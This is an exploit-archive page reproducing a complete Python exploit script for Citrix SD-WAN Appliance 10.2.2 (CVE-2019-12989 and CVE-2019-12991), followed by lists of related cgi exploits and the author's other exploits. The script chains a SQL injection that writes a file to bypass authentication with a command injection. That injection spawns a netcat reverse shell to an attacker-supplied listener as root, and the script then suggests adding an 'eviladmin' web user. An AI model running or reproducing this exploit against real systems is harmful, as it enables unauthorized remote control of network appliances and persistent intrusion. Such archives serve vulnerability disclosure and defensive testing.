Menu

"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution"

Author

"Chris Lyne"

Platform

cgi

Release date

2019-07-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
# Date: 2019-07-12
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.citrix.com
# Product: Citrix SD-WAN
# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
# Version: Tested against 10.2.2
# Tested on: 
#	- Vendor-provided .OVA file
# CVE: CVE-2019-12989, CVE-2019-12991
#
# See Also:
# https://www.tenable.com/security/research/tra-2019-32
# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
# https://support.citrix.com/article/CTX251987
#
# This code exploits both CVE-2019-12989 and CVE-2019-12991
# You'll need your own Netcat listener

import requests, urllib
import sys, os, argparse
import random
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

TIMEOUT = 10 # sec

def err_and_exit(msg):
    print '\n\nERROR: ' + msg + '\n\n'
    sys.exit(1)

# CVE-2019-12989
# auth bypass via file write
def do_sql_injection(base_url):
    url = base_url + '/sdwan/nitro/v1/config/get_package_file?action=file_download'
    headers = { 'SSL_CLIENT_VERIFY' : 'SUCCESS' }
    token = random.randint(10000, 99999)
    json = {
        "get_package_file": {
            "site_name"         : "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_" + str(token) + "';#",
            "appliance_type"    : "primary",
            "package_type"      : "active"
        }
    }

    try:
        r = requests.post(url, headers=headers, json=json, verify=False, timeout=TIMEOUT)
    except requests.exceptions.ReadTimeout:
        return None

    # error is expected
    expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"}
    if (r.status_code == 400 and r.json() == expected):
        return token
    else:
        return None

# CVE-2019-12991
# spawns a reverse shell
def do_cmd_injection(base_url, token, ncip, ncport):
    cmd = 'sudo nc -nv %s %d -e /bin/bash' % (ncip, ncport) # 
    url = base_url + '/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % (token, cmd)
    success = False
    try:
        r = requests.get(url, verify=False, timeout=TIMEOUT)
    except requests.exceptions.ReadTimeout:
        success = True

    # a timeout is success. it means we should have a shell
    return success

##### MAIN #####

desc = 'Citrix SD-WAN Appliance Auth Bypass and Remote Command Execution'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Citrix SD-WAN IP Address (Required)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')

args = arg_parser.parse_args()

print "Starting... be patient. This takes a sec."

# Path to target app
base_url = 'https://' + args.t

# do sql injection to get a swc-token for auth bypass
token = do_sql_injection(base_url)
if (token is None):
    err_and_exit('SQL injection failed.')

print 'SQL injection successful! Your swc-token is ' + str(token) + '.'

# if this worked, do the command injection
# create a new admin user and spawn a reverse shell
success = do_cmd_injection(base_url, token, args.ncip, args.ncport)

if success is False:
    err_and_exit('Not so sure command injection worked. Expected a timeout.')

print 'Seems like command injection succeeded.'
print 'Check for your shell!\n'
print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1'
Release Date Title Type Platform Author
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-02-18 "Master IP CAM 01 3.3.4.2103 - Remote Command Execution" webapps cgi "Raffaele Sabato"
2019-02-11 "IPFire 2.21 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-02-11 "Smoothwall Express 3.1-SP4 - Cross-Site Scripting" webapps cgi "Ozer Goker"
2019-01-24 "SirsiDynix e-Library 3.5.x - Cross-Site Scripting" webapps cgi AkkuS
2019-01-14 "AudioCode 400HD - Command Injection" webapps cgi Sysdream
2019-01-18 "Webmin 1.900 - Remote Command Execution (Metasploit)" remote cgi AkkuS
2019-01-07 "PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting" webapps cgi "Kumar Saurav"
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-08-15 "ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection" webapps cgi "Kyle Lovett"
2018-08-03 "cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal" webapps cgi "Google Security Research"
2018-03-30 "Homematic CCU2 2.29.23 - Remote Command Execution" webapps cgi "Patrick Muench and Gregor Kopf"
2018-03-30 "Homematic CCU2 2.29.23 - Arbitrary File Write" webapps cgi "Patrick Muench and Gregor Kopf"
2017-12-15 "ITGuard-Manager 0.0.0.1 - Remote Code Execution" webapps cgi "Nassim Asrir"
2017-12-13 "Meinberg LANTIME Web Configuration Utility 6.16.008 - Arbitrary File Read" webapps cgi "Jakub Palaczynski"
2017-11-28 "Synology StorageManager 5.2 - Root Remote Command Execution" webapps cgi SecuriTeam
2017-10-15 "Webmin 1.850 - Multiple Vulnerabilities" webapps cgi hyp3rlinx
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-07-19 "Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection" webapps cgi xort
2017-07-19 "Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)" webapps cgi xort
2017-07-19 "Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)" webapps cgi xort
2017-07-19 "Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)" webapps cgi xort
2017-07-19 "Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection" webapps cgi xort
2017-06-06 "Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure" webapps cgi "X41 D-Sec GmbH"
2017-04-07 "QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection" webapps cgi "Harry Sintonen"
2018-01-08 "Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration" webapps cgi "Steve Kaun"
2017-03-10 "dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting" webapps cgi "Shorebreak Security"
2017-01-27 "Radisys MRF - Command Injection" webapps cgi "Filippos Mastrogiannis"
2016-12-07 "NETGEAR R7000 - Command Injection" webapps cgi Acew0rm
2016-10-18 "Cgiemail 1.6 - Source Code Disclosure" webapps cgi "Finbar Crago"
Release Date Title Type Platform Author
2019-07-12 "Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution" webapps cgi "Chris Lyne"
2019-01-23 "Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation" webapps linux "Chris Lyne"
2018-11-05 "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" webapps asp "Chris Lyne"
2018-03-12 "Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution" webapps windows "Chris Lyne"
2018-01-30 "Advantech WebAccess < 8.3 - SQL Injection" webapps windows "Chris Lyne"
2018-03-30 "Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow" remote windows "Chris Lyne"
2017-11-29 "HP iMC Plat 7.2 - Remote Code Execution (2)" remote windows "Chris Lyne"
2017-11-28 "HP iMC Plat 7.2 - Remote Code Execution" remote windows "Chris Lyne"
2018-01-30 "HPE iMC 7.3 - RMI Java Deserialization" remote windows "Chris Lyne"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47112/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/47112/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47112/41499/citrix-sd-wan-appliance-1022-authentication-bypass-remote-command-execution/download/", "exploit_id": "47112", "exploit_description": "\"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution\"", "exploit_date": "2019-07-12", "exploit_author": "\"Chris Lyne\"", "exploit_type": "webapps", "exploit_platform": "cgi", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse